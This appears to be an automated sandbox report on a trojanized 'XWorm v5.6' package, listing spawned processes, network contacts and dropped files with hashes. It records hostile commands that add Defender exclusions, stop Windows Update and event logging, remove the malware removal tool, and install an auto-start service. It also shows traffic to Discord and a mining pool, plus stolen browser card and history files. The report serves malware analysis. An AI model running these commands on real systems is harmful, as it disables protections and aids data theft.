C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\System32\Wbem\wmic.exe

wmic cpu get Name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /F "C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe""

C:\Windows\system32\PING.EXE

ping localhost -n 3

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "MCDRJPTJ"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "MCDRJPTJ" binpath= "C:\ProgramData\Xworm_Bypass.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "MCDRJPTJ"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\Xworm_Bypass.exe

C:\ProgramData\Xworm_Bypass.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

dialer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 24.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:443 api.ipify.org tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 205.13.26.104.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 233.128.159.162.in-addr.arpa udp
US 104.26.13.205:443 api.ipify.org tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 eu.ss.btc.com udp
US 172.65.252.207:1800 eu.ss.btc.com tcp
US 8.8.8.8:53 207.252.65.172.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe

MD5 d626f885874892781aa6efcc7e0c2a69
SHA1 09f2aeab8f4618f26471261a746bad43bfc917ff
SHA256 df512cabbda87f7630eaa05abce3b84698a00a36d41222a95649f851d3317a1f
SHA512 26695528d81a1cf737d9337f11ca29fcbb7defb0418002e955501d7048c597cf23330be7bc49d33eceead020eb3a3e752d6a6c048ee54aa23c9e1981a520aa63

memory/1524-20-0x00007FF9DB143000-0x00007FF9DB145000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe

MD5 cbf264fda371ab41dccd5e100b59a2cb
SHA1 b0cea8c96cd73b6b085f5ef59ea820b120053754
SHA256 6e330ee9b36579c504acb6485d5be7e9a529713ca70e83fe15cfb36bc76584ed
SHA512 f2af35828d2074c3325eeb8fc0e0694fcbcdd844be630c0fa292276a32f2ec99eb599f9f035ba33204df31f4a368f248c60f35f2cf1df3eb929fe49cf77e6b7e

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe

MD5 fdd34dc8e5f2c59153cea0c37646ca8d
SHA1 7e8965a1bbd74f8f999f4dd94a66f9d240b8c7ab
SHA256 99704a3fbd648ef8449232da2768920ac86345939d789d918150fa52d72c1d7e
SHA512 980da4844bc0a2434978d9477b850198eab8fdd8f4272abcd50a2df3ef6a7d73f5d3928a73d747e67a15cf0ec9cd6b285df3bcf0b796536f34fe343701f82007

memory/1524-117-0x0000025D951A0000-0x0000025D96A58000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI14522\python312.dll

MD5 2889fb28cd8f2f32997be99eb81fd7eb
SHA1 adfeb3a08d20e22dde67b60869c93291ca688093
SHA256 435430e3abfde589d8535bc24a4b1d4147a4971dbe59e9377603974c07a1b637
SHA512 aaa33b8178a8831008ea6ad39b05189d55aa228a20a2315e45df6e2ff590c94478cfc76c9adb762689edb021ecdf98df3e7074d8d65c1c477273056b7509f8ee

C:\Users\Admin\AppData\Local\Temp\_MEI14522\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

memory/4176-126-0x00007FF9D93A0000-0x00007FF9D9A79000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI14522\base_library.zip

MD5 630153ac2b37b16b8c5b0dbb69a3b9d6
SHA1 f901cd701fe081489b45d18157b4a15c83943d9d
SHA256 ec4e6b8e9f6f1f4b525af72d3a6827807c7a81978cb03db5767028ebea283be2
SHA512 7e3a434c8df80d32e66036d831cbd6661641c0898bd0838a07038b460261bf25b72a626def06d0faa692caf64412ca699b1fa7a848fe9d969756e097cba39e41

memory/1524-128-0x0000025DB16A0000-0x0000025DB1894000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_bz2.pyd

MD5 f991618bfd497e87441d2628c39ea413
SHA1 98819134d64f44f83a18985c2ec1e9ee8b949290
SHA256 333c06fad79094d43465d128d68078296c925d1ea2b6b5bf13072a8d5cb65e7e
SHA512 3a9ecb293abedcdba3493feb7d19f987735ced5a5194abaa1d1e00946e7ea0f878dd71868eb3d9bfec80432df862367661b825c9e71409c60ec73d1708a63ef6

C:\Users\Admin\AppData\Local\Temp\_MEI14522\libffi-8.dll

MD5 bb1feaa818eba7757ada3d06f5c57557
SHA1 f2de5f06dc6884166de165d34ef2b029bb0acf8b
SHA256 a7ac89b42d203ad40bad636ad610cf9f6da02128e5a20b8b4420530a35a4fb29
SHA512 95dd1f0c482b0b0190e561bc08fe58db39fd8bb879a2dec0cabd40d78773161eb76441a9b1230399e3add602685d0617c092fff8bf0ab6903b537a9382782a97

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_lzma.pyd

MD5 f07f0cfe4bc118aebcde63740635a565
SHA1 44ee88102830434bb9245934d6d4456c77c7b649
SHA256 cc5302895aa164d5667d0df3ebeeee804384889b01d38182b3f7179f3c4ff8c0
SHA512 fcd701903ccd454a661c27835b53f738d947f38e9d67620f52f12781a293e42ae6b96c260600396883d95dd5f536dba2874aaee083adbcc78d66873cefc8e99d

memory/4176-143-0x00007FF9EEA70000-0x00007FF9EEA9D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_wmi.pyd

MD5 f3767430bbc7664d719e864759b806e4
SHA1 f27d26e99141f15776177756de303e83422f7d07
SHA256 787caad25cb4e2df023ead5e5a3fcd160b1c59a2e4ae1fc7b25c5087964defe8
SHA512 b587dfff4ba86142663de6ef8710ac7ab8831ca5fc989820b6a197bcd31ac5fdcb0b5982bf9a1fc13b331d0e53dc1b7367b54bb47910f3d1e18f8193449acb9c

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_queue.pyd

MD5 8347192a8c190895ec8806a3291e70d9
SHA1 0a634f4bd15b7ce719d91f0c1332e621f90d3f83
SHA256 b1ad27547e8f7ab2d1ce829ca9bdcc2b332dc5c2ef4fe224ccb76c78821c7a19
SHA512 de6858ed68982844c405ca8aecf5a0aa62127807b783a154ba5d844b44f0f8f42828dc097ac4d0d1aa8366cdcab44b314effcb0020b65db4657df83b1b8f5fed

C:\Users\Admin\AppData\Local\Temp\_MEI14522\select.pyd

MD5 c16b7b88792826c2238d3cf28ce773dd
SHA1 198b5d424a66c85e2c07e531242c52619d932afa
SHA256 b81be8cc053734f317ff4de3476dd8c383cc65fe3f2f1e193a20181f9ead3747
SHA512 7b1b2494fe0ef71869072d3c41ba1f2b67e3b9dcc36603d1503bb914d8b8e803dc1b66a3cbf0e45c43e4a5b7a8f44504a35d5e8e1090d857b28b7eba1b89c08a

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_socket.pyd

MD5 7e92d1817e81cbafdbe29f8bec91a271
SHA1 08868b9895196f194b2e054c04edccf1a4b69524
SHA256 19573ccc379190277674a013f35bf055f6dbb57adfce79152152a0de3ff8c87c
SHA512 0ed41a3ce83b8f4a492555a41881d292ece61d544f0a4df282f3cc37822255a7a32647724568c9a3b04d13fd3cc93eb080e54ac2ce7705b6b470454366be1cbe

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_uuid.pyd

MD5 7a00ff38d376abaaa1394a4080a6305b
SHA1 d43a9e3aa3114e7fc85c851c9791e839b3a0ee13
SHA256 720e9b68c41c8d9157865e4dd243fb1731f627f3af29c43250804a5995a82016
SHA512 ce39452df539eeeff390f260c062a0c902557fda25a7be9a58274675b82b30bddb7737b242e525f7d501db286f4873b901d94e1cd09aa8864f052594f4b34789

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_ssl.pyd

MD5 8696f07039706f2e444f83bb05a65659
SHA1 6c6fff6770a757e7c4b22e6e22982317727bf65b
SHA256 5405af77bc6ad0c598490b666c599c625195f7bf2a63db83632e3a416c73e371
SHA512 93e9f8fc1ae8a458eb4d9e7d7294b5c2230cb753386842e72d07cb7f43f248d204d13d93aedae95ec1a7aa6a81a7c09fdba56a0bc31924a1722c423473d97758

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_sqlite3.pyd

MD5 29a6551e9b7735a4cb4a61c86f4eb66c
SHA1 f552a610d64a181b675c70c3b730aa746e1612d0
SHA256 78c29a6479a0a2741920937d13d404e0c69d21f6bd76bdfec5d415857391b517
SHA512 54a322bfe5e34f0b6b713e22df312cfbde4a2b52240a920b2fa3347939cf2a1fecbeac44d7c1fa2355ee6dc714891acd3ee827d73131fd1e39fba390c3a444e6

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_overlapped.pyd

MD5 ed9cff0d68ba23aad53c3a5791668e8d
SHA1 a38c9886d0de7224e36516467803c66a2e71c7d9
SHA256 e88452d26499f51d48fe4b6bd95fc782bad809f0cb009d249aacf688b9a4e43f
SHA512 6020f886702d9ff6530b1f0dad548db6ad34171a1eb677cb1ba14d9a8943664934d0cfe68b642b1dd942a70e3ae375071591a66b709c90bd8a13303a54d2198b

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_multiprocessing.pyd

MD5 0c942dacb385235a97e373bdbe8a1a5e
SHA1 cf864c004d710525f2cf1bec9c19ddf28984ca72
SHA256 d5161d4e260b2bb498f917307f1c21381d738833efc6e8008f2ebfb9447c583b
SHA512 ca10c6842634cec3cada209b61dd5b60d8ea63722e3a77aa05e8c61f64b1564febe9612b554a469927dbce877b6c29c357b099e81fa7e73ceeae04b8998aa5a5

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_hashlib.pyd

MD5 caaea46ee25211cbdc762feb95dc1e4d
SHA1 1f900cc99c02f4300d65628c1b22ddf8f39a94d4
SHA256 3ef6e0e5bf3f1ea9713f534c496a96eded9d3394a64324b046a61222dab5073b
SHA512 68c2b1634fcca930c1651f550494a2ef187cf52dce8ff28f410ebed4d84487e3b08f6f70223a83b5313c564dcd293748f3c22f2a4218218e634e924c8390cf9a

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_decimal.pyd

MD5 c2f5d61323fb7d08f90231300658c299
SHA1 a6b15204980e28fc660b5a23194348e6aded83fc
SHA256 a8ea1e613149d04e7ce637413aad6df636556916902718f64e57fdff44f959bb
SHA512 df22676b5268175562574078459820f11eedb06f2845c86398c54861e9e3fb92547e7341b497fb0e79e9d3abba655e6593b1049bf78818c0ba7b9c96e3748606

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_cffi_backend.cp312-win_amd64.pyd

MD5 886da52cb1d06bd17acbd5c29355a3f5
SHA1 45dee87aefb1300ec51f612c3b2a204874be6f28
SHA256 770d04ebe9f4d8271659ba9bf186b8ae422fdd76f7293dbc84be78d9d6dd92cc
SHA512 d6c7a90b8fa017f72f499943d73e4015f2eec0e46188c27848892a99be35e0ecbda1f692630863b89109b04636e813ddad2051f323a24b4d373192a6b67cf978

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_asyncio.pyd

MD5 b72e9a2f4d4389175e96cd4086b27aac
SHA1 2acfa17bb063ee9cf36fadbac802e95551d70d85
SHA256 f9924bbead1aca98422ba421f5139a4c147559aae5928dfd2f6aada20cb6bb42
SHA512 b55f40451fa9bdd62c761823613fcfe734aaa28e26fb02a9620ad39ab7539c9257eac8cc10d4a3f2390c23a4d951cc02d695498530a4c1d91b4e51e625316e06

C:\Users\Admin\AppData\Local\Temp\_MEI14522\VCRUNTIME140_1.dll

MD5 f8dfa78045620cf8a732e67d1b1eb53d
SHA1 ff9a604d8c99405bfdbbf4295825d3fcbc792704
SHA256 a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5
SHA512 ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

memory/4176-170-0x00007FF9EEC90000-0x00007FF9EEC9D000-memory.dmp

memory/4176-169-0x00007FF9EF370000-0x00007FF9EF37D000-memory.dmp

memory/4176-168-0x00007FF9EF190000-0x00007FF9EF1A9000-memory.dmp

memory/4176-167-0x00007FF9F0910000-0x00007FF9F091D000-memory.dmp

memory/4176-172-0x00007FF9EBB70000-0x00007FF9EBBA3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI14522\unicodedata.pyd

MD5 4253cde4d54e752ae54ff45217361471
SHA1 06aa069c348b10158d2412f473c243b24d6fc7bc
SHA256 67634e2df60da6b457e4ebfbae3edb1f48d87752221600a5814b5e8f351166e6
SHA512 3b714a57747eddf39fc3a84ab3ca37cc0b8103dd3f987331ffb2d1d46f9a34f3793bb0493c55e02ab873314c8990eaebdd0284ad087a651c06a7f862b1a61c80

C:\Users\Admin\AppData\Local\Temp\_MEI14522\sqlite3.dll

MD5 8776a7f72e38d2ee7693c61009835b0c
SHA1 677a127c04ef890e372d70adc2ab388134753d41
SHA256 c467fcc7377b4a176e8963f54ffff5c96d1eb86d95c4df839af070d6d7dbf954
SHA512 815bf905fa9a66c05e5c92506d2661c87559c6205c71daa205368dbfd3d56b8a302a4d31729bc6d4c1d86cbcf057638aa17bde0d85ccc59ce1cbcb9e64349732

C:\Users\Admin\AppData\Local\Temp\_MEI14522\pyexpat.pyd

MD5 edcb8f65306461e42065ac6fc3bae5e7
SHA1 4faa04375c3d2c2203be831995403e977f1141eb
SHA256 1299da117c98d741e31c8fb117b0f65ae039a4122934a93d0bbb8dfbddd2dcd7
SHA512 221e6e1eb9065f54a48040b48f7b6109853306f04506ccf9ecb2f5813a5bd9675c38565a59e72770bf33d132977aa1558cc290720e39a4f3a74a0e7c2a3f88fa

C:\Users\Admin\AppData\Local\Temp\_MEI14522\libssl-3.dll

MD5 9b8d3341e1866178f8cecf3d5a416ac8
SHA1 8f2725b78795237568905f1a9cd763a001826e86
SHA256 85dd8c17928e78c20cf915c1985659fe99088239793f2bd46acb31a3c344c559
SHA512 815abc0517f94982fc402480bba6e0749f44150765e7f8975e4fcbfce62c4a5ff741e39e462d66b64ba3b804bd5b7190b67fff037d11bb314c7d581cfa6097a8

C:\Users\Admin\AppData\Local\Temp\_MEI14522\libcrypto-3.dll

MD5 e68a459f00b05b0bd7eafe3da4744aa9
SHA1 41565d2cc2daedd148eeae0c57acd385a6a74254
SHA256 3fcf6956df6f5dc92b2519062b40475b94786184388540a0353f8a0868413648
SHA512 6c4f3747af7be340a3db91e906b949684a39cafc07f42b9fcc27116f4f4bf405583fc0db3684312b277d000d8e6a566db2c43601fa2af499700319c660ef1108

memory/4176-142-0x00007FF9F0920000-0x00007FF9F0939000-memory.dmp

memory/4176-138-0x00007FF9F4060000-0x00007FF9F406F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_ctypes.pyd

MD5 76288ffffdce92111c79636f71b9bc9d
SHA1 15c10dcd31dab89522bf5b790e912dc7e6b3183b
SHA256 192cc2ac818c78cd21e9f969a95c0ff777d4cd5f79ae51ab7c366d2b8540f6a1
SHA512 29efc143cd72bf886e9bf54463706484f22222f024bd7e8cb206c32f40b76d823efd36061b05bbd6bcf562f83d95449acb3f1440c95e63750c643c15a10816c9

C:\Users\Admin\AppData\Local\Temp\_MEI14522\python3.dll

MD5 6271a2fe61978ca93e60588b6b63deb2
SHA1 be26455750789083865fe91e2b7a1ba1b457efb8
SHA256 a59487ea2c8723277f4579067248836b216a801c2152efb19afee4ac9785d6fb
SHA512 8c32bcb500a94ff47f5ef476ae65d3b677938ebee26e80350f28604aaee20b044a5d55442e94a11ccd9962f34d22610b932ac9d328197cf4d2ffbc7df640efba

memory/4176-176-0x00007FF9D5860000-0x00007FF9D592D000-memory.dmp

memory/4176-137-0x00007FF9F2D40000-0x00007FF9F2D65000-memory.dmp

memory/4176-178-0x000001CB8A300000-0x000001CB8A829000-memory.dmp

memory/4176-177-0x00007FF9D2660000-0x00007FF9D2B89000-memory.dmp

memory/4176-180-0x00007FF9EBB50000-0x00007FF9EBB66000-memory.dmp

memory/4176-183-0x00007FF9EB840000-0x00007FF9EB852000-memory.dmp

memory/4176-184-0x00007FF9EB800000-0x00007FF9EB835000-memory.dmp

memory/1524-187-0x00007FF9DB143000-0x00007FF9DB145000-memory.dmp

memory/4176-188-0x00007FF9EB7D0000-0x00007FF9EB7F4000-memory.dmp

memory/1524-192-0x0000025DB2410000-0x0000025DB3038000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI14522\psutil\_psutil_windows.pyd

MD5 d2ab09582b4c649abf814cdce5d34701
SHA1 b7a3ebd6ff94710cf527baf0bb920b42d4055649
SHA256 571115cca942bc76010b379df5d28afcb0f0d0de65a3bac89a95c6a86838b983
SHA512 022ccaeb99dc08997d917f85c6bc3aefdad5074c995008942a2f35f46ba07d73bb5bc7bc971ec71cb0e60dcb096b2c990866fe29c57670d069e7bdc3b14f6172

C:\Users\Admin\AppData\Local\Temp\_MEI14522\charset_normalizer\md__mypyc.cp312-win_amd64.pyd

MD5 4e5cd67d83f5226410ef9f5bc6fddab9
SHA1 dd75f79986808ff22f1049680f848a547ba7ab84
SHA256 80645609f9a48a8aaf988fa667f5aa32445e32f8027f61b27884d738ad608ae4
SHA512 e52eb7b51562a336c73c6b5b8a1ae821a7c2ad0145633858fc78d6af1a27d8f57ba59cfffa84a376f59d5362a19a7cc09fa1f691c7b50b3ac27c439781a42ba0

memory/4176-205-0x00007FF9D55C0000-0x00007FF9D56DB000-memory.dmp

memory/4176-203-0x00007FF9EB4D0000-0x00007FF9EB4F7000-memory.dmp

memory/4176-208-0x00007FF9EB420000-0x00007FF9EB42C000-memory.dmp

memory/4176-207-0x00007FF9EB4B0000-0x00007FF9EB4BB000-memory.dmp

memory/4176-206-0x00007FF9EB4C0000-0x00007FF9EB4CB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI14522\Cryptodome\Cipher\_raw_ecb.pyd

MD5 1a48e6e2a3243a0e38996e61f9f61a68
SHA1 488a1aa38cd3c068bdf24b96234a12232007616c
SHA256 c7b01a0290bc43910ee776bd90de05e37b77f5bd33feaf7d38f4c362e255e061
SHA512 d7acd779b7cab5577289511f137dc664966fcaac39748e33ca4d266a785b17766106944df21c8f2452fd28e008529f3e0097282ad3c69f1069a93df25c6da764

memory/4176-202-0x00007FF9EBB00000-0x00007FF9EBB0B000-memory.dmp

memory/4176-221-0x00007FF9EADB0000-0x00007FF9EADBC000-memory.dmp

memory/4176-220-0x00007FF9EADC0000-0x00007FF9EADD2000-memory.dmp

memory/4176-219-0x00007FF9EADE0000-0x00007FF9EADED000-memory.dmp

memory/4176-218-0x00007FF9EADF0000-0x00007FF9EADFC000-memory.dmp

memory/4176-217-0x00007FF9EAE00000-0x00007FF9EAE0C000-memory.dmp

memory/4176-216-0x00007FF9EAE10000-0x00007FF9EAE1B000-memory.dmp

memory/4176-215-0x00007FF9EAE20000-0x00007FF9EAE2B000-memory.dmp

memory/4176-214-0x00007FF9EAE30000-0x00007FF9EAE3C000-memory.dmp

memory/4176-213-0x00007FF9EAF20000-0x00007FF9EAF2E000-memory.dmp

memory/4176-229-0x00007FF9EAD20000-0x00007FF9EAD49000-memory.dmp

memory/4176-228-0x00007FF9EAF60000-0x00007FF9EAF6C000-memory.dmp

memory/4176-227-0x00007FF9EAF70000-0x00007FF9EAF7B000-memory.dmp

memory/4176-226-0x000001CB8A300000-0x000001CB8A829000-memory.dmp

memory/4176-225-0x00007FF9EBB70000-0x00007FF9EBBA3000-memory.dmp

memory/4176-224-0x00007FF9E9280000-0x00007FF9E92AE000-memory.dmp

memory/4176-223-0x00007FF9D4F20000-0x00007FF9D51A3000-memory.dmp

memory/4176-212-0x00007FF9EAF30000-0x00007FF9EAF3C000-memory.dmp

memory/4176-211-0x00007FF9EAF40000-0x00007FF9EAF4C000-memory.dmp

memory/4176-210-0x00007FF9EAF50000-0x00007FF9EAF5B000-memory.dmp

memory/4176-209-0x00007FF9D2660000-0x00007FF9D2B89000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI14522\charset_normalizer\md.cp312-win_amd64.pyd

MD5 21898e2e770cb9b71dc5973dd0d0ede0
SHA1 99de75d743f6e658a1bec52419230690b3e84677
SHA256 edd490bec8ec903cdbf62f39e0675181e50b7f1df4dc48a3e650e18d19804138
SHA512 dc8636d817ae1199200c24ac22def5d12642db951b87f4826015fd1d5c428d45410ce3b7f5bb5aaaa05deecf91d954b948f537bd6fa52a53364ab3609caac81d

memory/4176-196-0x00007FF9EB580000-0x00007FF9EB594000-memory.dmp

memory/4176-195-0x00007FF9EB7B0000-0x00007FF9EB7C8000-memory.dmp

memory/4176-193-0x00007FF9D93A0000-0x00007FF9D9A79000-memory.dmp

memory/4176-189-0x00007FF9D56E0000-0x00007FF9D5856000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MO2gs8XTiO\Browser\cc's.txt

MD5 5aa796b6950a92a226cc5c98ed1c47e8
SHA1 6706a4082fc2c141272122f1ca424a446506c44d
SHA256 c4c83da3a904a4e7114f9bd46790db502cdd04800e684accb991cd1a08ee151c
SHA512 976f403257671e8f652bf988f4047202e1a0fd368fdb2bab2e79ece1c20c7eb775c4b3a8853c223d4f750f4192cd09455ff024918276dc1dd1442fa3b36623ad

C:\Users\Admin\AppData\Local\Temp\MO2gs8XTiO\Browser\history.txt

MD5 5638715e9aaa8d3f45999ec395e18e77
SHA1 4e3dc4a1123edddf06d92575a033b42a662fe4ad
SHA256 4db7f6559c454d34d9c2d557524603c3f52649c2d69b26b6e8384a3d179aeae6
SHA512 78c96efab1d941e34d3137eae32cef041e2db5b0ebbf883e6a2effa79a323f66e00cfb7c45eb3398b3cbd0469a2be513c3ff63e5622261857eefc1685f77f76b

memory/4176-253-0x00007FF9D5860000-0x00007FF9D592D000-memory.dmp

memory/4176-255-0x00007FF9EEC40000-0x00007FF9EEC4F000-memory.dmp

memory/1524-258-0x0000025DB30F0000-0x0000025DB3172000-memory.dmp

memory/1524-259-0x0000025DB3240000-0x0000025DB32F2000-memory.dmp

memory/1524-260-0x0000025DB31E0000-0x0000025DB320C000-memory.dmp

memory/1524-261-0x0000025DB5120000-0x0000025DB5402000-memory.dmp

memory/4176-274-0x00007FF9D2660000-0x00007FF9D2B89000-memory.dmp

memory/4176-311-0x00007FF9EB7D0000-0x00007FF9EB7F4000-memory.dmp

memory/4176-321-0x00007FF9EEC40000-0x00007FF9EEC4F000-memory.dmp

memory/4176-320-0x00007FF9D4F20000-0x00007FF9D51A3000-memory.dmp

memory/4176-319-0x00007FF9E9280000-0x00007FF9E92AE000-memory.dmp

memory/4176-318-0x00007FF9EAD20000-0x00007FF9EAD49000-memory.dmp

memory/4176-317-0x00007FF9EADB0000-0x00007FF9EADBC000-memory.dmp

memory/4176-316-0x00007FF9EADC0000-0x00007FF9EADD2000-memory.dmp

memory/4176-315-0x00007FF9EADE0000-0x00007FF9EADED000-memory.dmp

memory/4176-314-0x00007FF9EADF0000-0x00007FF9EADFC000-memory.dmp

memory/4176-313-0x00007FF9EAE00000-0x00007FF9EAE0C000-memory.dmp

memory/4176-312-0x00007FF9EAE10000-0x00007FF9EAE1B000-memory.dmp

memory/4176-310-0x00007FF9EB840000-0x00007FF9EB852000-memory.dmp

memory/4176-309-0x00007FF9EBB50000-0x00007FF9EBB66000-memory.dmp

memory/4176-308-0x00007FF9EB800000-0x00007FF9EB835000-memory.dmp

memory/4176-307-0x00007FF9EB580000-0x00007FF9EB594000-memory.dmp

memory/4176-306-0x00007FF9D5860000-0x00007FF9D592D000-memory.dmp

memory/4176-305-0x00007FF9EBB70000-0x00007FF9EBBA3000-memory.dmp

memory/4176-304-0x00007FF9EEC90000-0x00007FF9EEC9D000-memory.dmp

memory/4176-303-0x00007FF9EF370000-0x00007FF9EF37D000-memory.dmp

memory/4176-302-0x00007FF9EF190000-0x00007FF9EF1A9000-memory.dmp

memory/4176-301-0x00007FF9F0910000-0x00007FF9F091D000-memory.dmp

memory/4176-300-0x00007FF9EEA70000-0x00007FF9EEA9D000-memory.dmp

memory/4176-299-0x00007FF9F0920000-0x00007FF9F0939000-memory.dmp

memory/4176-298-0x00007FF9F4060000-0x00007FF9F406F000-memory.dmp

memory/4176-297-0x00007FF9F2D40000-0x00007FF9F2D65000-memory.dmp

memory/4176-296-0x00007FF9D93A0000-0x00007FF9D9A79000-memory.dmp

memory/4176-295-0x00007FF9EAE20000-0x00007FF9EAE2B000-memory.dmp

memory/4176-294-0x00007FF9EAE30000-0x00007FF9EAE3C000-memory.dmp

memory/4176-293-0x00007FF9EAF20000-0x00007FF9EAF2E000-memory.dmp

memory/4176-292-0x00007FF9EAF30000-0x00007FF9EAF3C000-memory.dmp

memory/4176-291-0x00007FF9EAF40000-0x00007FF9EAF4C000-memory.dmp

memory/4176-290-0x00007FF9EAF50000-0x00007FF9EAF5B000-memory.dmp

memory/4176-289-0x00007FF9EAF60000-0x00007FF9EAF6C000-memory.dmp

memory/4176-288-0x00007FF9EAF70000-0x00007FF9EAF7B000-memory.dmp

memory/4176-287-0x00007FF9EB420000-0x00007FF9EB42C000-memory.dmp

memory/4176-286-0x00007FF9EB4B0000-0x00007FF9EB4BB000-memory.dmp

memory/4176-285-0x00007FF9EB4C0000-0x00007FF9EB4CB000-memory.dmp

memory/4176-284-0x00007FF9D55C0000-0x00007FF9D56DB000-memory.dmp

memory/4176-283-0x00007FF9EB4D0000-0x00007FF9EB4F7000-memory.dmp

memory/4176-282-0x00007FF9EBB00000-0x00007FF9EBB0B000-memory.dmp

memory/4176-280-0x00007FF9EB7B0000-0x00007FF9EB7C8000-memory.dmp

memory/4176-279-0x00007FF9D56E0000-0x00007FF9D5856000-memory.dmp

memory/4612-361-0x000001B5383D0000-0x000001B5383F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_023e02zr.mar.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
